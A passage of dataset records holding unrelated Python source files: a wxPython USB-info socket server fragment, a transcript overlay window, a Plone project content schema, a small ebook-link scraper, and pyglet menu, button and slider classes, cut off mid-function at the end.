wx.CallAfter(self.window.panel.PrintLog,\n \"\\n P2: \"+disconnect_info)\n break\n if data:\n result = self.verify_command(data)\n data= json.dumps(result)\n self.window.hcserver.conn_socket.sendall(data.encode('utf-8'))\n self.terminate() \n \n def verify_command(self, reqdict):\n \"\"\"\n this function is verified USB Tree view command \"usb\", and \"lsusb\".\n Args:\n self: The self parameter is a reference to the current \n instance of the class,and is used to access variables\n that belongs to the class.\n reqdict: request the command\n Returns:\n rdict: device info\n \"\"\"\n \n ctype = reqdict[\"ctype\"]\n cmd = reqdict[\"cmd\"]\n if(ctype == \"usb\"):\n if (cmd == \"lsusb\"):\n result = usbDev.get_usb_tree()\n rdict = {}\n rdict[\"data\"] = list(result)\n return rdict\n else:\n rdict = {}\n rdict[\"data\"] = \"Invalid command\"\n return rdict","repo_name":"mcci-usb/Cricket","sub_path":"src/thServer.py","file_name":"thServer.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"43926808295","text":"import wx\nfrom typing import Tuple\nfrom tray_icon import TaskBarIcon\n\nclass Overlay2(wx.Frame):\n def __init__(self, screen_width, screen_height, key_phrases, get_new_text_callback):\n self.get_new_text_callback = get_new_text_callback\n self.screen_width = screen_width\n self.screen_height = screen_height\n self.key_phrases = key_phrases\n self.dimensions: Tuple[int, int] = (int(screen_width/4), int(screen_height/5))\n self.coordinates: Tuple[int, int] = (\n int(self.screen_width/30),\n int(self.screen_height/2) - int(self.dimensions[1]/2)\n )\n style = ( wx.CLIP_CHILDREN | wx.STAY_ON_TOP | wx.FRAME_NO_TASKBAR |\n wx.NO_BORDER | wx.FRAME_SHAPED )\n \n wx.Frame.__init__(self, None, title='Fancy', style = style)\n self.SetTransparent(220)\n self.Show(True)\n self.SetPosition(wx.Point(self.coordinates[0], self.coordinates[1]))\n self.SetSize(wx.Size(self.dimensions[0], self.dimensions[1]))\n self.SetBackgroundColour((0,0,0))\n \n self.st = wx.TextCtrl(self, value=\"\", style = (wx.TE_READONLY | wx.TE_MULTILINE), pos = (0, 30), size=(self.dimensions[0],self.dimensions[1] - 30))\n self.st.Enable(False)\n self.st.SetScrollPos(wx.VERTICAL, self.st.GetScrollRange(wx.VERTICAL))\n self.st.SetInsertionPoint(-1)\n font = self.st.GetFont()\n font.PointSize = 12\n font.SetWeight(600)\n self.st.SetFont(font)\n self.st.SetForegroundColour((255,255,255))\n self.st.SetBackgroundColour((0,0,0))\n #self.st.Wrap(self.Size[0])\n\n self.kt = wx.TextCtrl(self, value=\"\", style = (wx.TE_READONLY), size=(self.dimensions[0], 30))\n self.kt.Enable(False)\n font = self.kt.GetFont()\n font.PointSize = 14\n font.SetWeight(800)\n self.kt.SetFont(font)\n self.kt.SetForegroundColour((0, 0, 0))\n\n self.timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.update_label, self.timer)\n self.timer.Start(2000)\n\n self.tb = TaskBarIcon(self.screen_width, self.screen_height, self.change_position, self.change_size)\n\n def update_label(self, event) -> None:\n wait_time, update_text = self.get_new_text_callback()\n self.check_transcript(update_text, self.key_phrases, None)\n self.st.SetValue(\"\\n\".join(update_text))\n self.st.SetScrollPos(wx.VERTICAL, self.st.GetScrollRange(wx.VERTICAL))\n self.st.SetInsertionPoint(-1)\n\n def update_key_label(self, phrases_list) -> None:\n self.kt.SetValue(\", \".join(phrases_list))\n self.kt.SetInsertionPoint(-1)\n #return\n \n def check_transcript(self, update_text, key_phrases, event):\n words_list = [] #list of current words in the updated text\n phrases_list = [] #list of phrases that actually appear in the updated text\n\n for i in update_text:\n words_list.extend(i.split())\n\n for i in words_list:\n for j in key_phrases.split():\n if (i.lower() == j.lower()):\n phrases_list.append(j)\n\n #print(phrases_list)\n self.update_key_label(phrases_list)\n return phrases_list\n\n\n def change_position(self, pos, event):\n self.SetPosition(wx.Point(pos[0], pos[1]))\n\n def change_size(self, size, event):\n self.SetSize(wx.Size(size[0], size[1]))\n self.st.SetSize(wx.Size(size[0], size[1]-30))\n self.kt.SetSize(wx.Size(size[0], 30))","repo_name":"LoganSchmalz/hackku","sub_path":"overlay2.py","file_name":"overlay2.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41747012442","text":"__author__ = \"\"\"unknown \"\"\"\n__docformat__ = 'plaintext'\n\nfrom AccessControl import ClassSecurityInfo\nfrom Products.Archetypes.atapi import *\nfrom zope.interface import implements\nimport interfaces\n\nfrom Products.CMFDynamicViewFTI.browserdefault import BrowserDefaultMixin\n\nfrom Products.uwosh_ploneprojects.config import *\n\n##code-section module-header #fill in your manual code here\n##/code-section module-header\n\ncopied_fields = {}\ncopied_fields['title'] = BaseFolderSchema['title'].copy()\ncopied_fields['title'].searchable = 1\ncopied_fields['title'].widget.label = \"Project Name\"\nschema = Schema((\n\n copied_fields['title'],\n\n TextField(\n name='briefDescription',\n widget=TextAreaWidget(\n rows=3,\n label=\"Brief Description\",\n label_msgid='uwosh_ploneprojects_label_briefDescription',\n i18n_domain='uwosh_ploneprojects',\n ),\n searchable=1,\n ),\n TextField(\n name='fullDescription',\n allowable_content_types=('text/plain', 'text/structured', 'text/html', 'application/msword',),\n widget=RichWidget(\n rows=3,\n label=\"Full Description\",\n label_msgid='uwosh_ploneprojects_label_fullDescription',\n i18n_domain='uwosh_ploneprojects',\n ),\n default_output_type='text/html',\n searchable=1,\n ),\n StringField(\n name='requestorName',\n widget=StringField._properties['widget'](\n label=\"Requestor Name\",\n label_msgid='uwosh_ploneprojects_label_requestorName',\n i18n_domain='uwosh_ploneprojects',\n ),\n required=1,\n ),\n StringField(\n name='requestorEmail',\n widget=StringField._properties['widget'](\n label=\"Requestor Email\",\n label_msgid='uwosh_ploneprojects_label_requestorEmail',\n i18n_domain='uwosh_ploneprojects',\n ),\n required=1,\n ),\n StringField(\n name='requestorOrg',\n widget=StringField._properties['widget'](\n label=\"Requestor Organization\",\n label_msgid='uwosh_ploneprojects_label_requestorOrg',\n i18n_domain='uwosh_ploneprojects',\n ),\n required=1,\n ),\n DateTimeField(\n name='projectDueDate',\n widget=DateTimeField._properties['widget'](\n label=\"Project Due Date\",\n label_msgid='uwosh_ploneprojects_label_projectDueDate',\n i18n_domain='uwosh_ploneprojects',\n ),\n write_permission=\"UWOshPloneProjects: Modify Advanced Content\",\n ),\n StringField(\n name='priority',\n widget=SelectionWidget(\n label=\"Priority\",\n label_msgid='uwosh_ploneprojects_label_priority',\n i18n_domain='uwosh_ploneprojects',\n ),\n write_permission=\"UWOshPloneProjects: Modify Advanced Content\",\n vocabulary=('Low', 'Medium', \"High\"),\n ),\n StringField(\n name='url',\n widget=StringField._properties['widget'](\n label='Url',\n label_msgid='uwosh_ploneprojects_label_url',\n i18n_domain='uwosh_ploneprojects',\n ),\n write_permission=\"UWOshPloneProjects: Modify Advanced Content\",\n ),\n TextField(\n name='notes',\n allowable_content_types=('text/plain', 'text/structured', 'text/html', 'application/msword',),\n widget=RichWidget(\n rows=3,\n label='Notes',\n label_msgid='uwosh_ploneprojects_label_notes',\n i18n_domain='uwosh_ploneprojects',\n ),\n default_output_type='text/html',\n searchable=1,\n ),\n TextField(\n name='requirements',\n allowable_content_types=('text/plain', 'text/structured', 'text/html', 'application/msword',),\n widget=RichWidget(\n rows=3,\n label='Requirements',\n label_msgid='uwosh_ploneprojects_label_requirements',\n i18n_domain='uwosh_ploneprojects',\n ),\n read_permission=\"UWOshPloneProjects: View Advanced Content\",\n searchable=1,\n default_output_type='text/html',\n write_permission=\"UWOshPloneProjects: Modify Advanced Content\",\n ),\n TextField(\n name='useCases',\n allowable_content_types=('text/plain', 'text/structured', 'text/html', 'application/msword',),\n widget=RichWidget(\n rows=3,\n label=\"Use Cases\",\n label_msgid='uwosh_ploneprojects_label_useCases',\n i18n_domain='uwosh_ploneprojects',\n ),\n read_permission=\"UWOshPloneProjects: View Advanced Content\",\n searchable=1,\n default_output_type='text/html',\n write_permission=\"UWOshPloneProjects: Modify Advanced Content\",\n ),\n TextField(\n name='features',\n allowable_content_types=('text/plain', 'text/structured', 'text/html', 'application/msword',),\n widget=RichWidget(\n rows=3,\n label='Features',\n label_msgid='uwosh_ploneprojects_label_features',\n i18n_domain='uwosh_ploneprojects',\n ),\n read_permission=\"UWOshPloneProjects: View Advanced Content\",\n searchable=1,\n default_output_type='text/html',\n write_permission=\"UWOshPloneProjects: Modify Advanced Content\",\n ),\n StringField(\n name='svnUrl',\n widget=StringField._properties['widget'](\n label='Svnurl',\n label_msgid='uwosh_ploneprojects_label_svnUrl',\n i18n_domain='uwosh_ploneprojects',\n ),\n write_permission=\"UWOshPloneProjects: Modify Advanced Content\",\n read_permission=\"UWOshPloneProjects: View Advanced Content\",\n ),\n),\n)\n\n##code-section after-local-schema #fill in your manual code here\n##/code-section after-local-schema\n\nProject_schema = BaseFolderSchema.copy() + \\\n schema.copy()\n\n##code-section after-schema #fill in your manual code here\n##/code-section after-schema\n\nclass Project(BaseFolder, BrowserDefaultMixin):\n \"\"\"\n \"\"\"\n security = ClassSecurityInfo()\n implements(interfaces.IProject)\n\n meta_type = 'Project'\n _at_rename_after_creation = True\n\n schema = Project_schema\n\n ##code-section class-header #fill in your manual code here\n ##/code-section class-header\n\n # Methods\n\n security.declarePublic('acceptProject')\n def acceptProject(self):\n \"\"\"\n \"\"\"\n pass\n\n\nregisterType(Project, PROJECTNAME)\n# end of class Project\n\n##code-section module-footer #fill in your manual code here\n##/code-section module-footer\n\n\n\n","repo_name":"uwosh/PloneProjects","sub_path":"content/Project.py","file_name":"Project.py","file_ext":"py","file_size_in_byte":6547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3765753806","text":"import requests\nfrom urllib.request import urlopen as uReq\nimport json\nfrom bs4 import BeautifulSoup as soup\n\nimport pprint\n\np1=\"http://lib1.org/fiction/\"\ndef getLink(md5):\n\turl=p1+str(md5)\n\tuClient=uReq(url)\n\tpage_html=uClient.read()\n\tuClient.close()\n\tpage_soup=soup(page_html,\"html.parser\")\n\t#pprint.pprint(page_soup,indent=4)\n\tcontainers=page_soup.find(id=\"info\")\n\tlink=containers.find('h2').find('a').get(\"href\")\n\tprint(link)\n\treturn(link)\n\nif __name__ == '__main__':\n \tgetLink(\"b65ce3b9bd242fdaa188468df9a727ef\") \n \t#Dummy Harry Potter MD5","repo_name":"ArpitKubadia/Ebook-Project","sub_path":"Flask App/dl.py","file_name":"dl.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35729694863","text":"import pyglet\nfrom pyglet.gl import *\n\n\n\nclass Slider():\n \"\"\"( center_x, center_y ) is the position of the center of the slider object. Text is the text that will be display slightly above and to the left of the slider itself. min_val and max_val are the text values that should be displayed at both ends of the slider. The colours are, in order, text colour, left half of non-hovered bar, right half of non-hovered bar, left half of hovered bar, right half of hovered bar.\"\"\"\n def __init__( self, default_val, min_val, max_val, window_width, window_height, center_x = 1/2, center_y=1/2, width=1/2, height=1/16, text=None, font=None, text_font_size=25, val_font_size=18, num_digits=0, colors=[ [ 255, 255, 255, 255 ], [ 0, 120, 212, 255 ], [ 144, 144, 144, 255 ], [ 0, 90, 158, 255 ], [ 208, 208, 208, 255 ] ], batch=None, foreground_group=None, background_group=None ):\n self.batch = batch\n self.foreground_group = foreground_group\n self.background_group = background_group\n self.window_width = window_width\n self.window_height = window_height\n self.center_x_ratio = center_x\n self.center_y_ratio = center_y\n self.center_x = self.center_x_ratio * self.window_width\n self.center_y = self.center_y_ratio * self.window_height\n self.width_ratio = width\n self.height_ratio = height\n self.original_width = self.width_ratio * self.window_width\n self.original_height = self.height_ratio * self.window_height\n self.width = self.width_ratio * self.window_width\n self.height = self.height_ratio * self.window_height\n self.resize_width_ratio = self.original_width / self.width\n self.resize_height_ratio = self.original_height / self.height\n self.text = text\n self.font = font\n self.font_x = self.center_x - self.width / 2\n self.font_y = self.center_y + self.height / 2\n self.text_font_size = text_font_size\n self.text_color = colors[ 0 ]\n self.left_half_color = colors[ 1 ]\n self.right_half_color = colors[ 2 ]\n self.left_half_hovered_color = colors[ 3 ]\n self.right_half_hovered_color = colors[ 4 ]\n self.left_edge = self.center_x - 3 * self.width / 8 ## Corresponds to where the slider will stop at self.min_val\n self.right_edge = self.center_x + 3 * self.width / 8 ## Corresponds to where the slider will stop at self.max_val\n self.val_text_center_x = self.center_x - 7 * self.width / 16\n self.val_text_center_y = self.center_y - self.height / 4\n self.val_font_size = val_font_size\n ## The top and bottom of the hover region are aligned with the top and bottom of the sliding circle.\n self.hover_top = self.val_text_center_y + self.height / 5\n self.hover_bottom = self.val_text_center_y - self.height / 5\n self.min_val = min_val\n self.max_val = max_val\n\n self.num_digits = num_digits\n if self.num_digits != 0:\n self.current_val = round( float( default_val ), self.num_digits )\n else:\n self.current_val = int( default_val )\n\n self.slider_current_x = self.left_edge + ( self.current_val - self.min_val ) / ( self.max_val - self.min_val ) * ( 3 * self.width / 4 )\n self.left_bar = pyglet.shapes.Line( self.left_edge, self.val_text_center_y, self.slider_current_x, self.val_text_center_y, self.height / 10, self.left_half_color[ : 3 ], batch=self.batch, group=self.background_group )\n self.right_bar = pyglet.shapes.Line( self.slider_current_x, self.val_text_center_y, self.right_edge, self.val_text_center_y, self.height / 10, self.right_half_color[ : 3 ], batch=self.batch, group=self.background_group )\n self.sliding_circle = pyglet.shapes.Circle( self.slider_current_x, self.val_text_center_y, self.height/5, color=self.left_half_color[ : 3 ], batch=self.batch, group=self.foreground_group )\n self.hover = False\n self.label = pyglet.text.Label( self.text, font_name=self.font, font_size=self.text_font_size, x=self.font_x, y=self.font_y, anchor_x='left', anchor_y='top', color=self.text_color, batch=self.batch, group=foreground_group )\n self.val_label = pyglet.text.Label( str( self.current_val ), font_name=self.font, font_size=self.val_font_size, x=self.val_text_center_x, y=self.val_text_center_y, anchor_x='center', anchor_y='center', color=self.text_color, batch=self.batch, group=foreground_group )\n\n\n def check_hover( self, mouse_x, mouse_y ):\n if self.left_edge < mouse_x < self.right_edge and self.hover_bottom < mouse_y < self.hover_top:\n self.hover = True\n self.left_bar.color = self.left_half_hovered_color[ : 3 ]\n self.right_bar.color = self.right_half_hovered_color[ : 3 ]\n self.sliding_circle.color = self.left_half_hovered_color[ : 3 ]\n return True\n else:\n self.hover = False\n self.left_bar.color = self.left_half_color[ : 3 ]\n self.right_bar.color = self.right_half_color[ : 3 ]\n self.sliding_circle.color = self.left_half_color[ : 3 ]\n return False\n\n\n def check_click( self, mouse_x, mouse_y ):\n self.change_slider_pos( mouse_x )\n self.set_current_val()\n return True\n\n\n def change_slider_pos( self, x ):\n self.slider_current_x = max( x, self.left_edge )\n self.slider_current_x = min( self.slider_current_x, self.right_edge )\n self.left_bar.x2 = self.slider_current_x * self.resize_width_ratio\n self.right_bar.x = self.slider_current_x * self.resize_width_ratio\n self.sliding_circle.x = self.slider_current_x * self.resize_width_ratio\n\n\n def set_current_val( self ):\n if self.num_digits != 0:\n self.current_val = round( self.min_val + ( ( self.slider_current_x - self.left_edge ) / ( self.right_edge - self.left_edge ) ) * ( self.max_val - self.min_val ), self.num_digits )\n else:\n self.current_val = int( self.min_val + ( ( self.slider_current_x - self.left_edge ) / ( self.right_edge - self.left_edge ) ) * ( self.max_val - self.min_val ) )\n\n self.val_label.text = str( self.current_val )\n\n\n def set_release( self ):\n pass\n\n\n def on_screen_resize( self, width, height ):\n ## In this case, the width and height of the screen has changed. So to check that a mouse is hovering over a button, we need to update self.left, self.right, self.bottom, and self.top since these no longer corresopnd to where the button actually renders on screen.\n ## Note, we don't have to change the vertex_lists or anything because we haven't changed resolution. So the screen will still render properly, however mouse coordinates are affected, so we only have to update the internal button position for hover and click checks.\n self.window_width = width\n self.window_height = height\n self.center_x = self.center_x_ratio * self.window_width\n self.center_y = self.center_y_ratio * self.window_height\n self.width = self.width_ratio * self.window_width\n self.height = self.height_ratio * self.window_height\n self.resize_width_ratio = self.original_width / self.width\n self.resize_height_ratio = self.original_height / self.height\n self.left_edge = self.center_x - 3 * self.width / 8 ## Corresponds to where the slider will stop at self.min_val\n self.right_edge = self.center_x + 3 * self.width / 8 ## Corresponds to where the slider will stop at self.max_val\n self.val_text_center_y = self.center_y - self.height / 4\n self.hover_top = self.val_text_center_y + self.height / 5\n self.hover_bottom = self.val_text_center_y - self.height / 5\n self.slider_current_x = self.left_edge + ( self.current_val - self.min_val ) / ( self.max_val - self.min_val ) * ( 3 * self.width / 4 )\n self.left_bar.x = self.left_edge * self.resize_width_ratio\n self.left_bar.x2 = self.slider_current_x * self.resize_width_ratio\n self.right_bar.x = self.slider_current_x * self.resize_width_ratio\n self.right_bar.x2 = self.right_edge * self.resize_width_ratio\n self.sliding_circle.x = self.slider_current_x * self.resize_width_ratio\n\n\n\nclass Button():\n \"\"\"( center_x, center_y ) is the position of the center of the button. width and height are as expected. Text is text that will be displayed. Colors takes a list of four colours, each a list with 4 values: RGBA. The list of colours corresponds to: text colour which defaults to ( 255, 255, 255, 255 ), button colour which defaults to ( 0, 120, 212, 255 ), button_hover colour = ( 16, 110, 190, 255 ), and button_click colour = ( 0, 90, 158, 255 ).\"\"\"\n def __init__( self, window_width, window_height, center_x=1/2, center_y=1/2, width=1/8, height=1/16, text=None, font=None, font_size=16, colors=[ [ 255, 255, 255, 255 ], [ 0, 120, 212, 255 ], [ 16, 110, 190, 255 ], [ 0, 90, 158, 255 ] ], batch=None, foreground_group=None, background_group=None, multiline=False ):\n self.batch = batch\n self.foreground_group = foreground_group\n self.background_group = background_group\n self.window_width = window_width\n self.window_height = window_height\n self.center_x_ratio = center_x\n self.center_y_ratio = center_y\n self.center_x = self.center_x_ratio * self.window_width\n self.center_y = self.center_y_ratio * self.window_height\n self.width_ratio = width\n self.height_ratio = height\n self.width = self.width_ratio * self.window_width\n self.height = self.height_ratio * self.window_height\n self.multiline = multiline\n self.text = text\n self.font = font\n self.text_color = colors[ 0 ]\n self.button_color = colors[ 1 ]\n self.button_hover_color = colors[ 2 ]\n self.button_click_color = colors[ 3 ]\n self.font_size = font_size\n self.left = self.center_x - self.width / 2\n self.right = self.center_x + self.width / 2\n self.bottom = self.center_y - self.height / 2\n self.top = self.center_y + self.height / 2\n self.hover = False\n self.click = False\n if self.multiline:\n self.label = pyglet.text.Label( self.text, font_name=self.font, font_size=self.font_size, x=self.center_x, y=self.center_y, anchor_x='center', anchor_y='center', color=self.text_color, batch=self.batch, group=foreground_group, multiline=self.multiline, width=self.width, align='center' )\n else:\n self.label = pyglet.text.Label( self.text, font_name=self.font, font_size=self.font_size, x=self.center_x, y=self.center_y, anchor_x='center', anchor_y='center', color=self.text_color, batch=self.batch, group=foreground_group )\n self.button = pyglet.shapes.Rectangle( self.left, self.bottom, self.width, self.height, self.button_color[ : 3 ], batch=self.batch, group=self.background_group )\n self.button_hover = pyglet.shapes.Rectangle( self.left, self.bottom, self.width, self.height, self.button_hover_color[ : 3 ], batch=self.batch, group=self.background_group )\n self.button_click = pyglet.shapes.Rectangle( self.left, self.bottom, self.width, self.height, self.button_click_color[ : 3 ], batch=self.batch, group=self.background_group )\n self.button_hover.visible = False\n self.button_click.visible = False\n\n\n def check_hover( self, mouse_x, mouse_y ):\n if self.left < mouse_x < self.right and self.bottom < mouse_y < self.top:\n self.hover = True\n self.button_hover.visible = True\n self.button.visible = False\n return True\n else:\n self.hover = False\n self.button_hover.visible = False\n self.button.visible = True\n return False\n\n\n def check_click( self, mouse_x, mouse_y ):\n if self.check_hover( mouse_x, mouse_y ):\n self.click = True\n self.button_click.visible = True\n self.button_hover.visible = False\n self.button.visible = False\n return True\n\n else:\n return False\n\n\n def set_release( self ):\n self.click = False\n self.button_click.visible = False\n self.button.visible = True\n\n\n def on_screen_resize( self, width, height ):\n ## In this case, the width and height of the screen has changed. So to check that a mouse is hovering over a button, we need to update self.left, self.right, self.bottom, and self.top since these no longer corresopnd to where the button actually renders on screen.\n ## Note, we don't have to change the vertex_lists or anything because we haven't changed resolution. So the screen will still render properly, however mouse coordinates are affected, so we only have to update the internal button position for hover and click checks.\n self.window_width = width\n self.window_height = height\n self.center_x = self.center_x_ratio * self.window_width\n self.center_y = self.center_y_ratio * self.window_height\n self.width = self.width_ratio * self.window_width\n self.height = self.height_ratio * self.window_height\n self.left = self.center_x - self.width / 2\n self.right = self.center_x + self.width / 2\n self.bottom = self.center_y - self.height / 2\n self.top = self.center_y + self.height / 2\n\n\n\nclass Menu( pyglet.event.EventDispatcher ):\n\n def __init__( self, menu_title_text, x_res, y_res, window_width, window_height, font=None ):\n self.x_res = x_res\n self.y_res = y_res\n self.window_width = window_width\n self.window_height = window_height\n self.font = font\n\n self.batch = pyglet.graphics.Batch()\n ## Background group is for buttons while foreground group is for button text.\n self.darken_group = pyglet.graphics.OrderedGroup( 0 )\n self.background_group = pyglet.graphics.OrderedGroup( 1 )\n self.foreground_group = pyglet.graphics.OrderedGroup( 2 )\n self.current_menu = False\n self.button_size_width = 1 / 4\n self.button_height = 2 / 3\n self.button_size_height = 1 / 9\n self.title_font_ratio = 72 / 720\n self.title_font_size = self.title_font_ratio * self.y_res\n self.font_ratio = 25 / 720\n self.slider_font_ratio = 25 / 720\n self.slider_font_size = self.slider_font_ratio * self.y_res\n self.slider_val_font_ratio = 18 / 720\n self.slider_val_font_size = self.slider_val_font_ratio * self.y_res\n self.font_size = self.font_ratio * self.y_res\n self.font_y = self.window_height * 6 / 7\n self.hovered_button = None\n self.clicked_button = None\n self.buttons = []\n self.menu_title_text = pyglet.text.Label( menu_title_text, font_name=self.font, font_size=self.title_font_size, x=self.window_width//2, y=self.font_y, anchor_x='center', anchor_y='center', batch=self.batch, group=self.background_group )\n\n\n def check_hover( self, mouse_x, mouse_y ):\n if self.hovered_button is not None:\n if not self.hovered_button.check_hover( mouse_x, mouse_y ):\n ## Then the mouse has been moved off the previously hovered button, and we set hovered_button to None.\n self.hovered_button = None\n ## Search through buttons to see if any other button is hovered over.\n for button in self.buttons:\n if button.check_hover( mouse_x, mouse_y ):\n self.hovered_button = button\n break\n\n else:\n ## Search through buttons to see if any other button is hovered over.\n for button in self.buttons:\n if button.check_hover( mouse_x, mouse_y ):\n self.hovered_button = button\n break\n\n\n def check_click( self, x, y ):\n self.check_hover( x, y )\n if self.hovered_button is not None:\n if self.hovered_button.check_click( x, y ):\n self.clicked_button = self.hovered_button\n\n\n def check_release( self, x, y ):\n ## This function will be redefined in each particular subclass of Menu to perform the relevant actions.\n pass\n\n\n def draw( self ):\n ## Draw menu. Draw menu_title_text and then draw buttons.\n self.batch.draw()\n\n\n def on_resize( self, width, height ):\n self.window_width = width\n self.window_height = height\n for button in self.buttons:\n button.on_screen_resize( width, height )\n\n\n\nclass IntroMenu( Menu ):\n def __init__( self, x_res, y_res, window_width, window_height, font=None ):\n super().__init__( '', x_res, y_res, window_width, window_height, font=font )\n ## x-coordinate offset from middle of the screen for buttons\n self.offset = ( 1 / 7 ) * ( 3 / 4 ) + ( 1 / 8 ) * ( 1 / 4 )\n self.left_col_x = 1 / 2 - self.offset\n self.right_col_x = 1 / 2 + self.offset\n self.button_height = 1 / 6\n\n self.level_select_button = Button( self.window_width, self.window_height, center_x=self.left_col_x, center_y=self.button_height, width=self.button_size_width, height=self.button_size_height, text='Level Select', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n self.options_button = Button( self.window_width, self.window_height, center_x=self.right_col_x, center_y=self.button_height, width=self.button_size_width, height=self.button_size_height, text='Options', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n self.quit_button = Button( self.window_width, self.window_height, center_x=7/8, center_y=1/6, width=1/9, height=1/6, text='Quit\\nGame', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group, multiline=True )\n self.buttons = [ self.level_select_button, self.options_button, self.quit_button ]\n\n\n def check_release( self, x, y ):\n if self.clicked_button is not None:\n if self.clicked_button.check_hover( x, y ):\n ## Then a button was clicked and released on, so we perform the relevant action.\n\n if self.clicked_button == self.level_select_button:\n self.dispatch_event( 'enter_submenu', 'level_select_menu' )\n\n if self.clicked_button == self.options_button:\n self.dispatch_event( 'enter_submenu', 'options_menu' )\n\n if self.clicked_button == self.quit_button:\n self.dispatch_event( 'exit_game' )\n\n self.clicked_button.set_release()\n self.clicked_button = None\n self.check_hover( x, y )\n\n\n\nclass MainPauseMenu( Menu ):\n def __init__( self, x_res, y_res, window_width, window_height, font=None ):\n super().__init__( 'Paused', x_res, y_res, window_width, window_height, font=font )\n ## x-coordinate offset from middle of the screen for buttons\n self.offset = ( 1 / 7 ) * ( 3 / 4 ) + ( 1 / 8 ) * ( 1 / 4 )\n self.left_col_x = 1 / 2 - self.offset\n self.right_col_x = 1 / 2 + self.offset\n self.controls_text = 'W:Forward\\nS:Backward\\nA:Left\\nD:Right\\nLeft Shift:Up\\nSpacebar:Down\\nEscape:Pause\\nRight Click:Take Screenshot\\nMouse Scroll: Change Movement Speed'\n self.controls_width = self.window_width * ( 2 / 3 )\n self.controls_text_left_x = ( self.left_col_x - self.button_size_width / 2 ) * self.window_width\n self.controls_text_y_offset = 1 / 50\n self.controls_text_top_y = ( self.button_height - self.button_size_height / 2 - self.controls_text_y_offset ) * self.window_height\n\n self.controls_image = pyglet.text.Label( self.controls_text, font_name=self.font, font_size=self.font_size, x=self.controls_text_left_x, y=self.controls_text_top_y, anchor_x='left', anchor_y='top', batch=self.batch, group=self.foreground_group, multiline=True, width=self.controls_width )\n self.level_select_button = Button( self.window_width, self.window_height, center_x=self.left_col_x, center_y=self.button_height, width=self.button_size_width, height=self.button_size_height, text='Level Select', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n self.options_button = Button( self.window_width, self.window_height, center_x=self.right_col_x, center_y=self.button_height, width=self.button_size_width, height=self.button_size_height, text='Options', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n self.quit_button = Button( self.window_width, self.window_height, center_x=7/8, center_y=1/6, width=1/9, height=1/6, text='Quit\\nGame', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group, multiline=True )\n self.buttons = [ self.level_select_button, self.options_button, self.quit_button ]\n\n\n def check_release( self, x, y ):\n if self.clicked_button is not None:\n if self.clicked_button.check_hover( x, y ):\n ## Then a button was clicked and released on, so we perform the relevant action.\n\n if self.clicked_button == self.level_select_button:\n self.dispatch_event( 'enter_submenu', 'level_select_menu' )\n\n if self.clicked_button == self.options_button:\n self.dispatch_event( 'enter_submenu', 'options_menu' )\n\n if self.clicked_button == self.quit_button:\n self.dispatch_event( 'exit_game' )\n\n self.clicked_button.set_release()\n self.clicked_button = None\n self.check_hover( x, y )\n\n\n\nclass OptionsMenu( Menu ):\n def __init__( self, x_res, y_res, window_width, window_height, font=None ):\n super().__init__( 'Options', x_res, y_res, window_width, window_height, font=font )\n self.button_row_2_y = 33 / 64\n ## x-coordinate offset from middle of the screen for buttons\n self.offset = ( 1 / 7 ) * ( 3 / 4 ) + ( 1 / 8 ) * ( 1 / 4 )\n self.left_col_x = 1 / 2 - self.offset\n self.right_col_x = 1 / 2 + self.offset\n self.slider_1_y = 23 / 64\n self.slider_2_y = 13 / 64\n\n ## Buttons\n self.wireframe_button = Button( self.window_width, self.window_height, center_x=self.left_col_x, center_y=self.button_height, width=self.button_size_width, height=self.button_size_height, text='Toggle Wireframe', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n self.textures_button = Button( self.window_width, self.window_height, center_x=self.right_col_x, center_y=self.button_height, width=self.button_size_width, height=self.button_size_height, text='Toggle Textures', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n self.skybox_button = Button( self.window_width, self.window_height, center_x=self.left_col_x, center_y=self.button_row_2_y, width=self.button_size_width, height=self.button_size_height, text='Toggle Skybox', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n self.fps_button = Button( self.window_width, self.window_height, center_x=self.right_col_x, center_y=self.button_row_2_y, width=self.button_size_width, height=self.button_size_height, text='Toggle FPS', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n\n ## Sliders\n self.fov_slider = Slider( 45, 30, 90, self.window_width, self.window_height, center_x = 1/2, center_y=self.slider_1_y, width=2/3, height=1/9, text=\"Field of View\", text_font_size=self.slider_font_size, font=self.font, val_font_size=self.slider_val_font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n self.mouse_sensitivity_slider = Slider( 50, 1, 100, self.window_width, self.window_height, center_x = 1/2, center_y=self.slider_2_y, width=2/3, height=1/9, num_digits=0, text=\"Mouse Sensitivity\", font=self.font, text_font_size=self.slider_font_size, val_font_size=self.slider_val_font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n\n ## Back button\n self.back_button = Button( self.window_width, self.window_height, center_x=1/8, center_y=6/7, width=1/9, height=1/6, text='Back', font=self.font, font_size=self.font_size, batch=self.batch, foreground_group=self.foreground_group, background_group=self.background_group )\n\n ## Button list ( also includes Sliders )\n self.buttons = [ self.wireframe_button, self.textures_button, self.skybox_button, self.fps_button, self.fov_slider, self.mouse_sensitivity_slider, self.back_button ]\n\n\n ## Redefine check_click from Menu class in order to deal with sliders.\n def check_click( self, x, y ):\n self.check_hover( x, y 